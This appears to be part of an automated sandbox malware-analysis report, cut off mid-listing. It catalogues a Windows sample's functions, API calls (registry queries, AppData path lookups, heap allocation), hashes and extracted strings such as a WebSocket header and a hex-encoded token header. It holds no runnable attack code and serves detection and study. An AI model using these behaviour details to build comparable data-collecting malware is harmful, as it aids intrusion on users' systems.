                                    • Opcode ID: 4d93022af20b72646d2bc8636ad0d867d21a8c1676b143d2bf04690914445881
                                    • Instruction ID: 975cda4fc9f56d37bcb2ae656d4b662cb42c8f12860a3ce1705dd6604cfe817a
                                    • Opcode Fuzzy Hash: 4d93022af20b72646d2bc8636ad0d867d21a8c1676b143d2bf04690914445881
                                    • Instruction Fuzzy Hash: 3221F5B1518305AF8354EF65D88589FBBF8FFC8214F408A1EF5A9C3214E730D5058BA2
                                    Function 00F83130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F83166
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F8316D
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A8C198,00000000,00020119,?), ref: 00F8318C
                                    • RegQueryValueExA.ADVAPI32(?,00A9DEB0,00000000,00000000,00000000,000000FF), ref: 00F831A7
                                    • RegCloseKey.ADVAPI32(?), ref: 00F831B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: e962f53b16c55dcde25fa6ca1f2cb92f589d8d96e3114e575782882f8525e16d
                                    • Instruction ID: 4397136ff72d8d88753e513b6a0a60da15f7972e376c0b207a85d1eb832a0b49
                                    • Opcode Fuzzy Hash: e962f53b16c55dcde25fa6ca1f2cb92f589d8d96e3114e575782882f8525e16d
                                    • Instruction Fuzzy Hash: 90119472A00208AFD714DF95D849FABB7BCF749B11F004129FA25E3684D775590087A1
                                    Function 00F890DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 31612cb9d80d8ba7ad4e50f82ab8088f44b27b1e61f58c09783252b3dc254c39
                                    • Instruction ID: 91d57797e6e105c388c0991979c8e2d6dc401126bf18653ba08b24fffe928463
                                    • Opcode Fuzzy Hash: 31612cb9d80d8ba7ad4e50f82ab8088f44b27b1e61f58c09783252b3dc254c39
                                    • Instruction Fuzzy Hash: BC41FC7150875C5EDB31AB24CC89FFB7BFC9B45704F1C44E8E58686182D2B59A45EF20
                                    Function 00F68980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F68996
                                      • Part of subcall function 00F8A1C0: std::exception::exception.LIBCMT ref: 00F8A1D5
                                      • Part of subcall function 00F8A1C0: std::exception::exception.LIBCMT ref: 00F8A1FB
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F689CD
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A188
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: invalid string position$string too long
                                    • API String ID: 2002836212-4289949731
                                    • Opcode ID: f94050518aecb3ec7140692adbaee11ff46d3a8e79f19810aff187c36608f70a
                                    • Instruction ID: 57aff8159a9d358f6e8a87eda236122f21b621677620058bb5ad9b6fc1ad5832
                                    • Opcode Fuzzy Hash: f94050518aecb3ec7140692adbaee11ff46d3a8e79f19810aff187c36608f70a
                                    • Instruction Fuzzy Hash: A521E7723006505BDB20DEACE840A6AF7A9DBA17E1B140B3FF541CB241CB75DC42E7A6
                                    Function 00F68850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F68883
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A188
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 50fffda8f11a8fc8e58827b8a540ea2603c564abd32c2a3942294ae72f339b05
                                    • Instruction ID: 4ca3ac4ca2b6a8d84fb182d11ac225742ca62862ef59a2828c20f32efef1bc55
                                    • Opcode Fuzzy Hash: 50fffda8f11a8fc8e58827b8a540ea2603c564abd32c2a3942294ae72f339b05
                                    • Instruction Fuzzy Hash: BC31B5B5E005159BCB08DF58C8906AEBBB6EB98350F148269E915AB385DB34AD02CB91
                                    Function 00F85910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F85922
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A188
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A1AE
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F85935
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_std::exception::exception
                                    • String ID: Sec-WebSocket-Version: 13$string too long
                                    • API String ID: 1928653953-3304177573
                                    • Opcode ID: ecbaebef357a90d274b06e8be8e19bb81ce67fbb5f4a10831e4bc3b5bce69904
                                    • Instruction ID: 8cea7c236aef7da5b9aa4893a4701052382621c8b25fe8ec481cd79346e45608
                                    • Opcode Fuzzy Hash: ecbaebef357a90d274b06e8be8e19bb81ce67fbb5f4a10831e4bc3b5bce69904
                                    • Instruction Fuzzy Hash: E411A531704B40CBD731AF2CE800B5977E1ABD1B70F250B9EE0D187695D761D841E7A1
                                    Function 00F83CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00F8A430,000000FF), ref: 00F83D20
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F83D27
                                    • wsprintfA.USER32 ref: 00F83D37
                                      • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 4b2545fb2752230779c94987b8e032da2a06520ae3c59188b75ad20dc6ee2e54
                                    • Instruction ID: 03980d9cc76cdcea1b9b44dbb5c6e186cb2df87a8ea242a53edd452baacc8923
                                    • Opcode Fuzzy Hash: 4b2545fb2752230779c94987b8e032da2a06520ae3c59188b75ad20dc6ee2e54
                                    • Instruction Fuzzy Hash: 5601C072640708BBE724AB55DC0AF6ABB6CFB46B65F140129FA359B2C0C7B45900C7A2
                                    Function 00F68710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F68737
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A188
                                      • Part of subcall function 00F8A173: std::exception::exception.LIBCMT ref: 00F8A1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 78e8cf855e59c942f85af5f868c0d61a802a51ffabc20a5d1cdcb5bc5475e58b
                                    • Instruction ID: 9572f6c6134772b7e41c11882d69811c584fc619438e94fa305966ed6874bd4d
                                    • Opcode Fuzzy Hash: 78e8cf855e59c942f85af5f868c0d61a802a51ffabc20a5d1cdcb5bc5475e58b
                                    • Instruction Fuzzy Hash: C5F09027F000310F8754643E8D8449EA94656E53E033AD769E81AEF299DC70EC83A5D5
                                    Function 00F7E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7E544
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E573
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E581
                                    • lstrcat.KERNEL32(?,00A9DCB0), ref: 00F7E59C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: a78cd5344e247a98eeed759ae3a8cb18745efbb1866aa50110bcc6fbcb9d9bc6
                                    • Instruction ID: f0bc14036c3c780060d8e5ea0648777935694e7b47aa09180114ed9ed95c6797
                                    • Opcode Fuzzy Hash: a78cd5344e247a98eeed759ae3a8cb18745efbb1866aa50110bcc6fbcb9d9bc6
                                    • Instruction Fuzzy Hash: 3851CD7591010CAFD764EB54DC42EEE337DFB88300F1844A9BA2AD7245EB749F809BA1
                                    Function 00F81FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00F81FDF, 00F81FF5, 00F820B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strlen
                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 39653677-4138519520
                                    • Opcode ID: 008eef3d8b54ea8942ea60633be8dabfbc0a3fd783678aad55542726096c272b
                                    • Instruction ID: 2adce165cfddb2226740a906c8ff8771ce668e81b882ba25f88394da764d4d37
                                    • Opcode Fuzzy Hash: 008eef3d8b54ea8942ea60633be8dabfbc0a3fd783678aad55542726096c272b
                                    • Instruction Fuzzy Hash: D0210A3691028A9FDB20FA36C4457DDF766EF80365F844056C8194B282E336790AF796
                                    Function 00F7EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7EBB4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7EBE3
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7EBF1
                                    • lstrcat.KERNEL32(?,00A9E400), ref: 00F7EC0C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
